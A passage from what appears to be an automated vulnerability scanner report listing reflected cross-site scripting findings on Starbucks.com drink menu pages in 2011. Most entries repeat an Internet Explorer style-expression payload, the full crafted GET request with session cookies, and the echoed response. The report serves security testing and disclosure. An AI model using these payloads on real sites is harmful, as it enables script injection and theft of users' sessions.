Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:56 GMT
Connection: close
Content-Length: 45212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee?cec96"style="x:expression(alert(1))"349c64eee81=1"/>
...[SNIP]...

2.162. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71256"style%3d"x%3aexpression(alert(1))"331875fd0d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71256"style="x:expression(alert(1))"331875fd0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style%3d"x%3aexpression(alert(1))"331875fd0d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:42 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage?71256"style="x:expression(alert(1))"331875fd0d7=1"/>
...[SNIP]...

2.163. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cee5"style%3d"x%3aexpression(alert(1))"c50edecec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cee5"style="x:expression(alert(1))"c50edecec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style%3d"x%3aexpression(alert(1))"c50edecec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:01 GMT
Connection: close
Content-Length: 42963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage?2cee5"style="x:expression(alert(1))"c50edecec=1"/>
...[SNIP]...

2.164. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13ebb"style="x:expression(alert(1))"f3fa25f47de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style%3d"x%3aexpression(alert(1))"f3fa25f47de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:39 GMT
Connection: close
Content-Length: 45020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage?13ebb"style="x:expression(alert(1))"f3fa25f47de=1"/>
...[SNIP]...

2.165. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2a77"style="x:expression(alert(1))"08cacbe5b0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style%3d"x%3aexpression(alert(1))"08cacbe5b0f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:40 GMT
Connection: close
Content-Length: 45296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage?b2a77"style="x:expression(alert(1))"08cacbe5b0f=1"/>
...[SNIP]...

2.166. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e6e"style%3d"x%3aexpression(alert(1))"257fad08362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98e6e"style="x:expression(alert(1))"257fad08362 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style%3d"x%3aexpression(alert(1))"257fad08362=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:37 GMT
Connection: close
Content-Length: 43317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage?98e6e"style="x:expression(alert(1))"257fad08362=1"/>
...[SNIP]...

2.167. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e66f5"style="x:expression(alert(1))"08de845d79f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style%3d"x%3aexpression(alert(1))"08de845d79f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:46 GMT
Connection: close
Content-Length: 44708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage?e66f5"style="x:expression(alert(1))"08de845d79f=1"/>
...[SNIP]...

2.168. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6ca72"style="x:expression(alert(1))"9fca5104888 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style%3d"x%3aexpression(alert(1))"9fca5104888=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:32 GMT
Connection: close
Content-Length: 45465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme?6ca72"style="x:expression(alert(1))"9fca5104888=1"/>
...[SNIP]...

2.169. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e85c"style%3d"x%3aexpression(alert(1))"331368f0807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e85c"style="x:expression(alert(1))"331368f0807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style%3d"x%3aexpression(alert(1))"331368f0807=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:03 GMT
Connection: close
Content-Length: 45253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage?4e85c"style="x:expression(alert(1))"331368f0807=1"/>
...[SNIP]...

2.170. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b41a"style="x:expression(alert(1))"7c9d6c61240 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style%3d"x%3aexpression(alert(1))"7c9d6c61240=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:43 GMT
Connection: close
Content-Length: 45282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage?5b41a"style="x:expression(alert(1))"7c9d6c61240=1"/>
...[SNIP]...

2.171. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a8c8"style="x:expression(alert(1))"fd9920fedb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style%3d"x%3aexpression(alert(1))"fd9920fedb7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:59 GMT
Connection: close
Content-Length: 45430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme?1a8c8"style="x:expression(alert(1))"fd9920fedb7=1"/>
...[SNIP]...

2.172. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5ef7"style="x:expression(alert(1))"69f7e0c5087 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style%3d"x%3aexpression(alert(1))"69f7e0c5087=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:13 GMT
Connection: close
Content-Length: 45272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme?b5ef7"style="x:expression(alert(1))"69f7e0c5087=1"/>
...[SNIP]...

2.173. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf9f7"style="x:expression(alert(1))"70fdedd5bf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style%3d"x%3aexpression(alert(1))"70fdedd5bf5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:59 GMT
Connection: close
Content-Length: 45570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee?bf9f7"style="x:expression(alert(1))"70fdedd5bf5=1"/>
...[SNIP]...

2.174. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/caramel-apple-spice

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb864"style%3d"x%3aexpression(alert(1))"66df403bea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb864"style="x:expression(alert(1))"66df403bea2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/kids-drinks-and-other/caramel-apple-spice?eb864"style%3d"x%3aexpression(alert(1))"66df403bea2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:34 GMT
Connection: close
Content-Length: 41154

